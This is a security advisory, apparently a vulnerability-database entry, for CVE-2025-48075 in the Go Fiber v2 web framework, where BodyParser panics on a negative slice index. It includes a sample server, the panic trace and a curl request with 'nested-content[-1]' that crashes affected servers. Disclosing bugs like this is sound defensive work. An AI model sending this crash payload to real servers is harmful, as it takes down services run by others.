ghsa-hg3g-gphw-5hhm
Vulnerability from github
Summary
When using the fiber.Ctx.BodyParser
to parse into a struct with range values, a panic occurs when trying to parse a negative range index
Details
fiber.Ctx.BodyParser
can map flat data to nested slices using key[idx]value
syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data.
Since this data is user-provided, this could lead to denial of service for anyone relying on this fiber.Ctx.BodyParser
functionality
Reproducing
Take a simple GoFiberV2 server which returns a JSON encoded version of the FormData ```go package main
import ( "encoding/json" "fmt" "net/http"
"github.com/gofiber/fiber/v2"
)
type RequestBody struct {
NestedContent []*struct {
Value string form:"value"
} form:"nested-content"
}
func main() { app := fiber.New()
app.Post("/", func(c *fiber.Ctx) error {
formData := RequestBody{}
if err := c.BodyParser(&formData); err != nil {
fmt.Println(err)
return c.SendStatus(http.StatusUnprocessableEntity)
}
c.Set("Content-Type", "application/json")
s, _ := json.Marshal(formData)
return c.SendString(string(s))
})
fmt.Println(app.Listen(":3000"))
}
```
Correct Behaviour
Send a valid request such as:
bash
curl --location 'localhost:3000' \
--form 'nested-content[0].value="Foo"' \
--form 'nested-content[1].value="Bar"'
You recieve valid JSON
json
{"NestedContent":[{"Value":"Foo"},{"Value":"Bar"}]}
Crashing behaviour
Send an invalid request such as:
bash
curl --location 'localhost:3000' \
--form 'nested-content[-1].value="Foo"'
The server panics and crashes
```
panic: reflect: slice index out of range
goroutine 8 [running]: reflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?) /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167 github.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...}) [...] ```
Impact
Anyone using fiber.Ctx.BodyParser
can/will have their servers crashed when an invalid payload is sent
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/gofiber/fiber/v2" }, "ranges": [ { "events": [ { "introduced": "2.52.6" }, { "fixed": "2.52.7" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2025-48075" ], "database_specific": { "cwe_ids": [ "CWE-129" ], "github_reviewed": true, "github_reviewed_at": "2025-05-22T20:08:31Z", "nvd_published_at": "2025-05-22T18:15:43Z", "severity": "HIGH" }, "details": "### Summary\nWhen using the `fiber.Ctx.BodyParser` to parse into a struct with range values, a panic occurs when trying to parse a negative range index\n\n### Details\n`fiber.Ctx.BodyParser` can map flat data to nested slices using `key[idx]value` syntax, however when idx is negative, it causes a panic instead of returning an error stating it cannot process the data. \n\nSince this data is user-provided, this could lead to denial of service for anyone relying on this `fiber.Ctx.BodyParser` functionality \n\n### Reproducing\nTake a simple GoFiberV2 server which returns a JSON encoded version of the FormData\n```go\npackage main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\n\t\"github.com/gofiber/fiber/v2\"\n)\n\ntype RequestBody struct {\n\tNestedContent []*struct {\n\t\tValue string `form:\"value\"`\n\t} `form:\"nested-content\"`\n}\n\nfunc main() {\n\tapp := fiber.New()\n\n\tapp.Post(\"/\", func(c *fiber.Ctx) error {\n\t\tformData := RequestBody{}\n\t\tif err := c.BodyParser(\u0026formData); err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn c.SendStatus(http.StatusUnprocessableEntity)\n\t\t}\n c.Set(\"Content-Type\", \"application/json\")\n s, _ := json.Marshal(formData)\n return c.SendString(string(s))\n\t})\n\n\tfmt.Println(app.Listen(\":3000\"))\n}\n\n```\n\n**Correct Behaviour**\nSend a valid request such as:\n```bash\ncurl --location \u0027localhost:3000\u0027 \\\n--form \u0027nested-content[0].value=\"Foo\"\u0027 \\\n--form \u0027nested-content[1].value=\"Bar\"\u0027\n```\nYou recieve valid JSON\n```json\n{\"NestedContent\":[{\"Value\":\"Foo\"},{\"Value\":\"Bar\"}]}\n```\n\n**Crashing behaviour**\nSend an invalid request such as:\n```bash\ncurl --location \u0027localhost:3000\u0027 \\\n--form \u0027nested-content[-1].value=\"Foo\"\u0027\n```\nThe server panics and crashes\n```\npanic: reflect: slice index out of range\n\ngoroutine 8 [running]:\nreflect.Value.Index({0x738000?, 0xc000010858?, 0x0?}, 0x738000?)\n /usr/lib/go-1.24/src/reflect/value.go:1418 +0x167\ngithub.com/gofiber/fiber/v2/internal/schema.(*Decoder).decode(0xc00002c570, {0x75d420?, 0xc000010858?, 0x7ff424822108?}, {0xc00001c498, 0x17}, {0xc00014e2d0, 0x2, 0x2}, {0xc00002c710, ...})\n[...]\n```\n\n### Impact\nAnyone using `fiber.Ctx.BodyParser` can/will have their servers crashed when an invalid payload is sent", "id": "GHSA-hg3g-gphw-5hhm", "modified": "2025-05-28T19:46:57Z", "published": "2025-05-22T20:08:31Z", "references": [ { "type": "WEB", "url": "https://github.com/gofiber/fiber/security/advisories/GHSA-hg3g-gphw-5hhm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48075" }, { "type": "WEB", "url": "https://github.com/gofiber/fiber/commit/e115c08b8f059a4a031b492aa9eef0712411853d" }, { "type": "PACKAGE", "url": "https://github.com/gofiber/fiber" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2025-3706" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P", "type": "CVSS_V4" } ], "summary": "Fiber panics when fiber.Ctx.BodyParser parses invalid range index" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.